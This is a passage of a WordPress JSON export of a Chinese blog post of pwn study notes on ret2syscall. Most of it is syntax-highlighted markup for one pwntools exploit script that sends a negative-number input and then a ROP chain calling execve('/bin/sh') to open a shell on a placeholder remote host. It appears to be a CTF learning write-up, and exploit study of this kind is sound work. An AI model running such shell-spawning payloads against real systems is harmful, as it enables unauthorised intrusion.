class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import *  \n\np = remote(\"ip\", port)    \n\npop_rdi = 0x40264f  \npop_rax = 0x458827  \npop_rsi = 0x40a67e  \npop_rdx_pop_rbx = 0x4a404b  \nsyscall = 0x402404  \nsh = 0x4E60F0  \n\np.sendlineafter(b'> ', b'1')  \np.recv()  \np.sendline(b'1')  \np.recv()  \np.sendline(b'-1000000')  \n\np.sendlineafter(b'> ', b'4')  \np.sendlineafter(b'> ', b'5')  \n\npayload = b'\/bin\/sh\\x00' + b'a' * (0x20 - 8) + b'=Triode=' + p64(pop_rax) + p64(59) + p64(pop_rdi) + p64(sh) + p64(pop_rsi) + p64(0) + p64(pop_rdx_pop_rbx) + p64(0) + p64(0) + p64(syscall)  \n\np.recv()  \np.sendline(payload)  \n\np.interactive()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> pwn <\/span><span style=\"color: #81A1C1\">import<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">remote<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">ip<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> port<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">    <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rdi <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">40264f<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rax <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">458827<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rsi <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">40a67e<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rdx_pop_rbx <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4a404b<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">syscall <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">402404<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">sh <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4E60F0<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">&gt; <\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">1<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recv<\/span><span style=\"color: #ECEFF4\">()<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendline<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">1<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recv<\/span><span style=\"color: #ECEFF4\">()<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendline<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">-1000000<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">&gt; <\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">4<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">&gt; <\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">5<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">\/bin\/sh<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rax<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">59<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">sh<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rsi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdx_pop_rbx<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">syscall<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recv<\/span><span style=\"color: #ECEFF4\">()<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendline<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">interactive<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u7ed3\u679c\u5982\u4e0b\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-49.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-49.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"410\" height=\"424\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-49.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-182\"  sizes=\"auto, (max-width: 410px) 100vw, 410px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u5728\u4e00\u4e9b\u60c5\u51b5\u4e0b\u4e5f\u53ef\u4ee5\u901a\u8fc7ret2syscall\u6765\u5bf9\u5176\u4ed6\u51fd\u6570\u8fdb\u884c\u8c03\u7528\u6765\u8fbe\u5230\u76ee\u6807\uff0c\u5728\u6b64\u5c31\u4e0d\u8fc7\u591a\u8d58\u8ff0\u4e86.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pwn\u65b9\u5411ret2\u7cfb\u5217\u5b66\u4e60\u7b14\u8bb0<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13],"tags":[14],"class_list":["post-149","post","type-post","status-publish","format-standard","hentry","category-pwn","tag-pwn"],"_links":{"self":[{"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/posts\/149","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/comments?post=149"}],"version-history":[{"count":5,"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/posts\/149\/revisions"}],"predecessor-version":[{"id":186,"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/posts\/149\/revisions\/186"}],"wp:attachment":[{"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/media?parent=149"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/categories?post=149"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.triode.cc\/index.php\/wp-json\/wp\/v2\/tags?post=149"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}